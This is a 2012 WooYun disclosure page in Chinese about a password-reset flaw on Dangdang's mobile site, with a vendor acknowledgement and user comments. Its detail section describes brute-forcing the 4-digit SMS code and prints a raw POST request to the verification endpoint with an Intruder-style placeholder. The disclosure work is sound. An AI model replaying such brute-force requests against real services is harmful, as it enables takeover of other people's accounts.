当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-011833

漏洞标题:当当网任意用户密码修改漏洞

相关厂商:当当网

漏洞作者: kobin97

提交时间:2012-09-06 17:14

修复时间:2012-10-21 17:15

公开时间:2012-10-21 17:15

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-09-06: 细节已通知厂商并且等待厂商处理中
2012-09-06: 厂商已经确认,细节仅向厂商公开
2012-09-16: 细节向核心白帽子及相关领域专家公开
2012-09-26: 细节向普通白帽子公开
2012-10-06: 细节向实习白帽子公开
2012-10-21: 细节向公众公开

简要描述:

当当网任意用户密码修改漏洞

详细说明:

http://m.dangdang.com/forget_psd.php?sid=e14aa9b65e0f4d05
输入要更新帐号的手机号码,然后提交。
下一步,对验证码进行暴破,由于验证码只4位。。网速乐观的情况下,数分钟就能破解出来。
也不多说了,经测试,成功破解了数个帐号。
POST /verify_fp.php?sid=e88bf0a11d2e7920 HTTP/1.1
Host: m.dangdang.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://m.dangdang.com/verify_fp.php?sid=e88bf0a11d2e7920
Content-Type: application/x-www-form-urlencoded
action=verify&sid=e88bf0a11d2e7920&mobile=xxxx&verify=§v§&submit=%E6%8F%90%E4%BA%A4

漏洞证明:

修复方案:

你比我更懂!

版权声明:转载请注明来源 kobin97@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2012-09-06 18:31

厂商回复:

十分感谢。我们会尽快处理这个问题。稍后会有我们的购物卡送上,聊表一下对您的感谢。

最新状态:

暂无

漏洞评价:

评论

  1. 2012-09-06 17:16 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    不得不信

  2. 2012-09-06 17:23 | p.z 认证白帽子 ( 普通白帽子 | Rank:411 漏洞数:40 )

    不得不幸福

  3. 2012-09-06 17:29 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    我日当当也有!!你们这群禽兽!!!

  4. 2012-09-06 17:51 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    祝大家幸福

  5. 2012-09-06 17:51 | beastk ( 实习白帽子 | Rank:50 漏洞数:11 | 一不小心高潮了)

    蛋疼!

  6. 2012-09-06 17:53 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    呵呵,看来这个问题是一波新风潮,只有这样才能引起厂商的重视,让暴风雨来的更猛烈些吧!

  7. 2012-09-06 17:54 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    祝你们幸福T_T

  8. 2012-09-06 17:54 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @only_guest 这一波是谁带起来的啊

  9. 2012-09-06 19:00 | livers ( 实习白帽子 | Rank:94 漏洞数:6 | mov esp,0jmp espcrash.....)

    我草 @kobin97 敢不敢share 购物卡的金额

  10. 2012-09-06 19:39 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    @xsser 牛奶坦克发的比较久吧.我发了一个新浪一个微信还有一个phpstat数据分析系统这三个的任意密码修改.

  11. 2012-09-06 19:45 | P1n9y_fly ( 实习白帽子 | Rank:97 漏洞数:11 | ضصششسسزرذخكللممنيئؤؤ...)

    购物卡。。。 *-*。。。<眼睛放光>。。。

  12. 2012-09-06 19:49 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @only_guest 专题啊

  13. 2012-09-06 19:58 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    @xsser 睡觉去.好累.醒来再说..

  14. 2012-09-07 08:27 | 豆芽 ( 路人 | Rank:0 漏洞数:1 | 修行中)

    @only_guest 电商!!!

  15. 2012-09-07 08:56 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    逻辑漏洞好啊~黑盒推逻辑

  16. 2012-09-07 09:40 | upload ( 普通白帽子 | Rank:251 漏洞数:43 | 此处略--!)

    哇 很暴力

  17. 2012-09-07 12:26 | kobin97 认证白帽子 ( 核心白帽子 | Rank:1754 漏洞数:190 | 关注网络安全。。)

    @livers 我也不知道。。。

  18. 2012-09-26 18:33 | upload ( 普通白帽子 | Rank:251 漏洞数:43 | 此处略--!)

    @NiceWorm

  19. 2012-09-27 10:26 | kobin97 认证白帽子 ( 核心白帽子 | Rank:1754 漏洞数:190 | 关注网络安全。。)

    收到了,谢谢。。。

  20. 2012-10-08 19:52 | Byte ( 路人 | Rank:5 漏洞数:2 | 菜鸟一个,希望结识各位大大。)

    @kobin97 洞主,你幸福吗?

  21. 2012-10-21 17:44 | 小牟东 ( 路人 | Rank:0 漏洞数:1 | 小菜菜)

    多少钱的购物卡啊?

  22. 2012-10-21 17:54 | w5r2 ( 普通白帽子 | Rank:226 漏洞数:52 )

    @xsser 俺的提交怎么还没出现。。。呜呜!!!

  23. 2012-10-21 19:25 | S_先生 ( 路人 | Rank:2 漏洞数:2 | 请叫我S先生)

    金额多少?有兴趣。

  24. 2012-10-21 19:38 | 桔子 ( 路人 | Rank:4 漏洞数:4 | 一个小小的学生而已)

    购物卡。。。。。。。。。

  25. 2012-10-21 22:30 | popok ( 普通白帽子 | Rank:117 漏洞数:24 | nothing)

    用户体验和安全之间需要平衡啊

  26. 2013-01-11 15:37 | Metas ( 路人 | Rank:9 漏洞数:2 )

    暴力破解的是撒软件啊

  27. 2013-01-11 16:17 | 当当网(乌云厂商)

    burpsuite

  28. 2013-01-11 16:19 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @当当网 热心的厂商啊

  29. 2013-10-13 19:32 | BadCat ( 实习白帽子 | Rank:81 漏洞数:21 | 悲剧的我什么都不会)

    有购物卡!!好好!!!!

  30. 2014-08-16 22:50 | 红领巾 ( 路人 | Rank:22 漏洞数:4 | 有些漏洞,如果只是从技术层面来说明问题,...)

    买买买买买!!!!!